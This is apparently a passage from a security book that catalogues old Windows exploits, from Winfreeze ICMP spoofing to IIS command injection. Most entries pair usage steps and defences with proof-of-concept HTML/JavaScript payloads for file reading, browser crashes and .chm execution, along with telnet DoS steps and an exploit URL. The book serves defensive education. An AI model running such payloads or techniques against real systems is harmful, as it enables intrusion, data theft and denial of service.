Hackers Beware

Winfreeze

This exploit is really a spoofing exploit, however it shows that when an attacker uses some creativity and sends it to an unexpected system, it can cause problems.

•Name: Winfreeze

•Operating System: WINNT, Win9x

•Protocols/Services: The exploit code is a small script that runs on a UNIX-based machine and uses ICMP redirect packets to crash a Windows system.

How the Exploit Works

The attacker will initiate ICMP/Redirect host messages storm, which look like they are coming from the router. This is accomplished by spoofing the internal IP address of the router. The victim’s Windows machine will change its routing table because of the redirect host messages it is receiving from the spoofed device. This event causes the victim’s Windows machine to freeze and loose network functionality.

How to Use the Exploit

Winfreeze is the executable used. It is run from a command prompt and only requires the IP of the intended target.

Signature of the Attack

The easiest way to detect this exploit is to look for an ICMP packet flood destined for the IP address of the internal interface of the router.

How to Protect Against It

Configure the network devices to block spoofing attempts. This can be done by using anti-spoof filters, which are available on most routers.

Additional Information

Additional information and the source code can be found at:

•www.antionline.com/cgi-bin/Antisearchlinks.cgi?ID=46325091&url= http://www.anticode.com

•www.microsoft.com

Microsoft Windows Media Player JavaScript URL

Vulnerability

This exploit takes advantage of a vulnerability in Microsoft’s Windows Media Player ActiveX control.

Exploit Details

•Name: Microsoft Windows Media Player JavaScript URL Vulnerability

•Operating System: Windows NT, 2000, 9x

•Protocols/Services: Microsoft Windows Media Player 7

How the Exploit Works

An attacker can execute a JavaScript URL from within the Windows Media Player ActiveX control, which is embedded in HTML. This JavaScript can be executed in arbitrary frames that are specified within the ActiveX control.

This allows an attacker to take over the frame’s document object model, which will bypass the security restrictions on the victim’s machine. This is accomplished by having the victim visit a special web page. An attacker exploiting this vulnerability has the ability to read files and execute arbitrary programs on the victim’s system.

How to Use the Exploit

The easiest way to run this exploit is to activate the given script through any web browser.

How to Protect Against It

This vulnerability requires that ActiveX and JavaScript are enabled on the victim’s machine. Adjusting the security settings in Microsoft’s Internet Explorer can stop it. If ActiveX and Active Scripting options are set to Disabled, this vulnerability will be prevented.

Source Code/Pseudo Code

The following is the code used to launch this exploit:

<object id="o1" classid="clsid:6BF52A52-394A-11D3-B153- 00C04F79FAA6">

<PARAM NAME="defaultFrame" value="georgi"> </object>

<SCRIPT>

alert("This page reads C:\\test.txt"); window.open("file://c:/test.txt","georgi"); function f()

{

document.o1.object.launchURL("javascript:alert(document.body.i

nnerText)");

}

setTimeout("f()",1000);

</SCRIPT>

Additional Information

Additional information and the source code can be found at www.securityfocus.com

Microsoft Internet Explorer Mstask.exe CPU Consumption

Vulnerability

By default, the program mstask.exe listens to ports between 1025 and 1220. A local or remote user can cause a CPU utilization Denial of Service attack if malformed arguments are sent to the mstask.exe service. By default, mstask.exe enables connections through the local host only. A restart of the infected system is required to gain normal functionality.

Exploit Detail

•Name: Microsoft Internet Explorer ‘mstask.exe’ CPU Consumption Vulnerability

•Operating System: Windows NT, 2000, 9x

•Protocols/Services: Task scheduler engine (mstask.exe). IE 5.0 and 5.1

How the Exploit Works

MSTask.exe, which usually listens on port TCP 1026, causes memory to be used if it is connected and random characters are sent to it. After this connection, the machine would eventually freeze. The only solution is to reboot. MSTask.exe only permits connections through the local host. Due to this fact, most systems would have to originate the attack from the console. A user connecting to the victim’s machine through Terminal Server would have the same ability to exploit this vulnerability. If Wingate or Winproxy are installed on the victim’s system, the system becomes vulnerable for remote attackers because they can connect to the system’s 1026 TCP port through Wingate or Winproxy.

How to Use the Exploit

The following are the steps an attacker would take to run this exploit:

1.Start telnet.exe.

2.Menu->Connect->Remote System=127.0.0.1 , Port=1026

3.Press the ‘Connect’ button.

4.When it is connects, type some random characters and press Enter.

5.Close telnet.exe.

Signature of the Attack

The main signature if this attack is high CPU utilization spikes until a reboot is performed.

How to Protect Against It

There are currently no available patches to fix this vulnerability. Through implementing a policy of principle of least privilege and defense in depth, the impact can be minimized.

Source Code/Pseudo Code

Because this exploit is trivial to run, there is no source code required. If someone wanted to, it would be easy to write a Perl script to automate the steps.

Additional Information

Additional information and the source code can be found at www.securityfocus.com

Microsoft MSHTML.DLL Crash Vulnerability

This vulnerability involves how Javascript handles multiple window objects. If a window object is deleted after it receives data, and then it is re-initialized, the library will crash.

Exploit Details

•Name: Microsoft MSHTML.DLL Crash Vulnerability

•Operating System: Microsoft Windows 98se, Microsoft Windows 98, Microsoft Windows 95, Microsoft Windows NT 4.0, and Microsoft Windows NT 2000

•Protocols/Services: Microsoft Internet Explorer 4.0 for Windows NT 4.0, Microsoft Internet Explorer 4.0 for Windows 98, Microsoft Internet Explorer 4.0 for Windows 95, Microsoft Internet Explorer 4.0 for Windows 3.1, Microsoft Outlook 2000, Microsoft Outlook Express 5.5, Microsoft Internet Explorer 5.5, Microsoft Internet Explorer 5.0.1 for Windows NT 4.0, Microsoft Internet Explorer 5.0.1 for Windows 98, Microsoft Internet Explorer 5.0.1 for Windows 95, Microsoft Internet Explorer 5.0.1 for Windows 2000, and Microsoft Internet Explorer 5.01

How the Exploit Works

The exploit works by deleting a windows object after it has received data from the attacker’s machine.

How to Use the Exploit

A malicious user programs a web page to attack the end user when the user opens the page.

Signature of the Attack

A web site that, when viewed, causes the local machine to freeze.

How to Protect Against It

Currently, as of Spring 2001, there are no known patches to fix this exploit. Microsoft has acknowledged this and states that it will release a patch in the next service pack.

Source Code/Pseudo Code

The following is the source code for this exploit:

<iframe id=test style="display:none"></iframe> <script>

Larholm = {}; // Object literal test.document.open(); // Stream data

test.document.write("<s"+"cript>top.Larholm.test=0</s"+"cript>

");

delete Larholm; Larholm = {}; // Crash </script>

An attacker would setup a web page and embed this code to exploit a victim.

Additional Information

Additional information and source code can be found at: www.securityfocus.com.

2001 IIS 5.0 Allows File Viewing

This script allows remote users to gain access to the content of /scrips/test.pl. This has the possibility of giving away passwords in CGI.

Exploit Details

•Name: 2001 IIS 5.0 allows viewing files using %3F+.htr

•Operating System: Windows 2000

•Protocols/Services: IIS 5.0 and TCP/IP

Signature of the Attack

IIS 5.0 with the File Fragmenting patch installed.

How to Protect Against It

The best way to protect against this vulnerability is to uninstall the File fragmenting patch for IIS 5.0 or to remove the vulnerable Perl script.

Source Code/Pseudo Code

If the target host is vulnerable, an attacker would just type the following URL into his browser to exploit the script: http://TARGETIIS/scripts/test.pl+.htr

Additional Information

The following is where the source code and additional information can be found:

•www.securityfocus.com

•www.microsoft.com

Media Player 7 and IE Java Vulnerability

There is a security vulnerability in the Windows Media Player 7 application that is exploitable through IE and Java. This exploit enables someone to read local files and browse local directories as well as execute arbitrary programs. This could lead to a remote user taking full control over the victim’s computer.

Exploit Details

•Name: Media Player 7 and IE Java vulnerability

•Operating System: Windows 95,98, 98se, 2000, NT

•Protocols/Services: IE Java, Windows Media Player 7

How the Exploit Works

Windows Media Player skins are installed in a commonly known directory with a commonly known name: “C:/Program files/Windows Media Player/Skins/SKIN.WMZ”.

The < IFRAME SRC=”wmp2.wmz”>< /IFRAME> will download wmp2.wmz and place it in “C:/Program files/Windows Media Player/Skins/wmp2.wmz”.

If wmp2.wmz is a java jar archive with the following applet tag,

--------------

< APPLET CODEBASE="file://c:/" ARCHIVE="Program files/Windows Media

Player/SKINS/wmp2.wmz" CODE="gjavacodebase.class" WIDTH=700 HEIGHT=300> < PARAM

NAME="URL" VALUE="file:///c:/test.txt"> < /APPLET>

---------------

it will be executed with codebase=file://c:/, and the applet will have read only access to C:\.

How to Use the Exploit

Any HTML editor can be used to make the hostile web site. Create a page with the given code. When a user links to that page, the vulnerability will be exploited.

Signature of the Attack

A sign of this exploit is when programs activate that the user did not intentionally start.

How to Protect Against It

The best way to prevent against this attack is to disable Java, which is not always possible. As you can see with a lot of these new exploits, there is not a lot that can be done except to make sure all your systems and networking components implement a principle of least privilege and that you have defense in depth mechanisms in place protecting your corporate assets.

Source Code/Pseudo Code

The following is the source code that an attacker would put on a hostile web page and wait for a victim to connect:

--------wmp7-3.html-------------

<IFRAME SRC="wmp2.wmz" WIDTH=1 HEIGHT=1>< /IFRAME>

<SCRIPT>

function f()

{

window.open("wmp7-3a.html");

}

setTimeout("f()",4000); < /SCRIPT>

----------------------------------

------wmp7-3a.html----------

< APPLET CODEBASE="file://c:/"

ARCHIVE="Program files/Windows Media Player/SKINS/wmp2.wmz" CODE="gjavacodebase.class"

WIDTH=700 HEIGHT=300>

<PARAM NAME="URL" VALUE="file:///c:/test.txt">

</APPLET>

-----------------------------------

Additional Information

The following URL is where the source code and additional information can be found: http://www.netsecurity.org/text/bugs/979586134,83134,.shtml

IE 5.x/Outlook Allows Executing Arbitrary Programs

There is a security vulnerability in IE 5.x/Outlook/Outlook Express, which allows the execution of arbitrary programs using .chm files. This will reveal the location of the temporary Internet file folder on the victim’s machine. This can lead to an attacker taking full control over the victim’s computer.

Exploit Details

•Name: IE 5.x/Outlook allows executing arbitrary programs using

.chm files and the temporary Internet file folder.

•Operating System: Windows 95, 98, 98se, NT, 2000

•Protocols/Services: IE 5.x/Outlook/Outlook Express

How the Exploit Works

<OBJECT DATA=“http://SOMEHOST.COM/chmtemp.html”

TYPE=“text/html” WIDTH=200 HEIGHT=200> may reveal one of the temporary internet files folders through the document’s URL (where SOMEHOST.COM is a web server or alias that is different from the web server from which the HTML page is loaded). After a temporary Internet file folder name is known, it is possible to cache a .chm in any temporary Internet file folder and then use window.showHelp() to execute it.

Signature of the Attack

The only way to tell that this exploit has been used is if applications begin without the user activating them.

How to Protect Against It

This kind of attack can be avoided by setting the IE security on your machine to high.

Source Code/Pseudo Code

The following is the source code for running this exploit:

---------chmtempmain.html-------------------------------------

-----

<IMG SRC="chm1.chm" WIDTH=1 HEIGHT=1>

<IMG SRC="chm2.chm" WIDTH=1 HEIGHT=1>

<IMG SRC="chm3.chm" WIDTH=1 HEIGHT=1>

<IMG SRC="chm4.chm" WIDTH=1 HEIGHT=1>

<IMG SRC="chm5.chm" WIDTH=1 HEIGHT=1>

<IMG SRC="chm6.chm" WIDTH=1 HEIGHT=1>

<IMG SRC="chm7.chm" WIDTH=1 HEIGHT=1>

<IMG SRC="chm8.chm" WIDTH=1 HEIGHT=1>

<IMG SRC="chm9.chm" WIDTH=1 HEIGHT=1>

<IMG SRC="chm10.chm" WIDTH=1 HEIGHT=1> <BR>

The object below must be loaded from a server with name different from the parent

document - it may be the same server but use the IP address or another alias.

<BR>

If this does not work try increasing the number of "chm*.chm" in IMG and showHelp.

<BR>

<OBJECT DATA="http://guninski.com/chmtemp.html" TYPE="text/html" WIDTH=200

HEIGHT=200>

--------------------------------------------------------------

-------

--------chtmtemp.html-----------------------------------------

-------

<SCRIPT> function g()

{

s=document.URL;

path=s.substr(0,s.lastIndexOf("\\"));

path=unescape(path);

alert("One of your temp files directory is: "+path); window.showHelp(path+"\\chm1[1].chm"); window.showHelp(path+"\\chm2[1].chm");

window.showHelp(path+"\\chm3[1].chm");

window.showHelp(path+"\\chm4[1].chm");

window.showHelp(path+"\\chm5[1].chm");

window.showHelp(path+"\\chm6[1].chm");

window.showHelp(path+"\\chm7[1].chm");

window.showHelp(path+"\\chm8[1].chm");

window.showHelp(path+"\\chm9[1].chm");

window.showHelp(path+"\\chm10[1].chm");

}

setTimeout("g()",5000); // if you are on a slow internet connection you must

increase the delay </SCRIPT>

--------------------------------------------------------------

-------

Additional Information

Source code and additional information can be found at

http://www.guninski.com/

IIS 5.0 Allows Executing Arbitrary Commands on the Web Server

If patch Q277873 is installed on IIS 5.0, then a remote attacker can execute arbitrary programs on the web server.

Exploit Details

•Name: IIS 5.0 with patch Q277873 allows executing arbitrary commands on the web server

•Operating System: Any Microsoft Server Platform with IIS 5.0 and patch Q277873

•Protocols/Services: IIS 5.0

How the Exploit Works

When IIS receives a valid request for an executable file, it passes the name of the requested file to the Windows operating system for processing. It is possible for an attacker to create a malformed file request that contains both a file name and one or more operating system commands. When the system receives this request, IIS passes the entire string to the operating system, which would then process the file and execute the commands.

How to Use the Exploit

The only product needed to run the exploit is an Internet browser and the given Script.